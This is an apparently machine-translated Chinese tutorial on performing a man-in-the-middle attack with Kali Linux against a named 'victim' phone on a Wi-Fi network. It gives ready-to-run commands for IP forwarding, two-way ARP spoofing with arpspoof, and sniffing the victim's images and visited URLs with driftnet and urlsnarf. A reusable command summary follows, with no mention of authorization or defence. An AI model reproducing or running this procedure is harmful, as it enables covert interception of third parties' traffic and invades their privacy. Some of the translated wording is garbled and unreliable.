本文概述
- 要求
- 1.在Linux中启用数据包转发
- 2.用伪装拦截受害者的包裹
- 3.使用arpspoof拦截来自路由器的数据包
- 4.从受害者导航中嗅探图像
- 5.从受害者导航中嗅探URL信息
- 6.禁用数据包转发(仅在攻击完成后)
- 总结
要求 本文假定你知道什么是网络接口, 并且知道如何使用Kali Linux和命令行。在开始之前, 你需要知道网络接口的名称(安装在计算机上)和提供Wi-Fi访问的路由器的IP。
攻击者必填信息 | Example value (you need to replace these values) |
网络接口名称 | wlan0 |
路由器IP | 192.000.000.1 |
对于受害者, 你只需要IP(用户需要连接到路由器提供的网络)。获取受害者设备IP的过程完全取决于你, 了解它的方法有很多, 例如, 有路由器/网关用户界面程序列出了所有连接的设备(列表中有IP)或仅使用网络监控软件工具。
受害者必填信息 | Example value (you need to replace these values) |
受害者设备IP | 192.000.000.52 |
文章图片
我们将对使用Google Chrome的Samsung Galaxy S7(连接到IP 192.000.000.52的路由器(路由器ip 192.000.000.1))进行一次MITM攻击, 并将在不同的网站上导航以显示攻击是否确实有效。收集了所有必需的信息后, 就开始吧!
1.在Linux中启用数据包转发 你需要做的第一件事是转发所有IPv4网络包。这样, 你的计算机将充当路由器。在新终端中执行以下命令:
sysctl -w net.ipv4.ip_forward=1
注意 如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处。
2.用伪装拦截受害者的包裹 【如何使用Kali Linux进行中间人(MITM)攻击】arpspoof是一个命令行实用程序, 可让你截取交换局域网上的数据包。它也通过伪造ARP响应来重定向来自LAN上目标主机(或所有主机)的数据包, 这些数据包将用于LAN上的另一主机。这是嗅探交换机上流量的一种非常有效的方法。开始拦截从受害者到路由器的数据包的命令结构如下:
arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
因此, 使用我们的值, 命令应如下所示:
重要 在新的终端上运行命令并使其运行(除非要停止攻击, 否则请先将其关闭)。
arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1
此过程将监视从受害者到路由器的数据包流。
3.使用arpspoof拦截来自路由器的数据包 现在你要拦截从受害者到路由器的数据包(在终端上运行), 现在需要使用arpspoof拦截从受害者到路由器的数据包。开始拦截从路由器到受害者的数据包的命令结构如下:
arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
因此, 使用我们的值, 命令应如下所示:
重要 在新的终端上运行命令并使其运行(除非要停止攻击, 否则请先将其关闭)。
arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52
如你所见, 它与上一步的命令相同, 但是我们切换了参数的位置。到目前为止, 你已经渗透到受害者与路由器之间的连接。现在, 你只需要学习如何使用流网和urlsnarf读取那些数据包。
4.从受害者导航中嗅探图像 要查看受害者访问的网站中的图像, 你需要使用流网。 Driftnet是一个程序, 它侦听网络流量并从其观察到的TCP流中提取图像。在看到大量网络流量的主机上运行很有趣。启动漂流网并查看用户在网站上看到的图像的命令结构如下:
driftnet -i [Network Interface Name]
注意 如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处。
有了我们掌握的信息, 我们的命令应如下所示:
driftnet -i wlan0
5.从受害者导航中嗅探URL信息 要获取有关我们受害者访问的网站的信息, 你可以使用urlsnarf。这是一个命令行工具, 用于以” 通用日志格式” 嗅探HTTP请求。它以CLF(通用日志格式, 几乎所有Web服务器都使用)输出从HTTP流量中嗅探到的所有请求的URL, 适用于使用你喜欢的Web日志分析工具(模拟, wwwstat等)进行脱机后处理。嗅探受害者访问的URL的命令结构如下:
urlsnarf -i [Network interface name]
在这种情况下, 根据我们拥有的信息, 要执行的命令将如下所示:
注意 如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处。
urlsnarf -i wlan0
恭喜, 如果你仔细地执行了所有步骤, 那么现在你应该正在侦听有关通过MITM攻击选择的目标的信息。一旦受害者访问了网站, 你就应该能够阅读有关其在互联网上的行为的信息。要停止攻击, 请在运行已打开任何进程的每个终端上按CTRL +C。
6.禁用数据包转发(仅在攻击完成后) 一旦完成攻击(你不再想嗅探), 请记住再次在终端上执行以下命令来禁用系统中的数据包转发:
sysctl -w net.ipv4.ip_forward=0
总结 如果你已经按照本教程进行操作, 那么你所做的一切都正确并且可以按预期工作, 然后在下一次要执行此操作的过程摘要:
# Enable port forwardingsysctl -w net.ipv4.ip_forward=1# Spoof connection between Victim and Router# Note: Run this command in a new terminal and let it runningarpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]# Same step but inverted (nope, it's not the same ...)# Note: Run this command in a new terminal and let it runningarpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]# Execute driftnet to sniff images# Note: Run this command in a new terminal and let it runningdriftnet -i [Network Interface Name]# Sniff URL traffic of the victim# Note: Run this command in a new terminal and let it runningurlsnarf -i [Network Interface Name]# Disable port forwarding once you're done with the attacksysctl -w net.ipv4.ip_forward=0# Examples for values# [Network Interface Name] = wlan0# [Victim IP] = 192.000.xx# [Router IP] = 192.000.1
骇客骇客!
推荐阅读
- 如何在Kali Linux中使用Nmap枚举Web服务器目录
- 如何在Kali Linux上安装Spotify
- 如何在Kali Linux中使用Nikto2扫描Web服务器漏洞
- 如何在Kali Linux中使用SlowHTTPTest(测试服务器Slowloris保护)执行DoS攻击”Slow HTTP”
- 使用Android O的画中画功能
- 回到Android中的后备堆栈中的不同Activity
- 在Android中启动服务
- 如何检查Android应用程序是在后台还是前台或终止()
- 将Button链接到android中的现有活动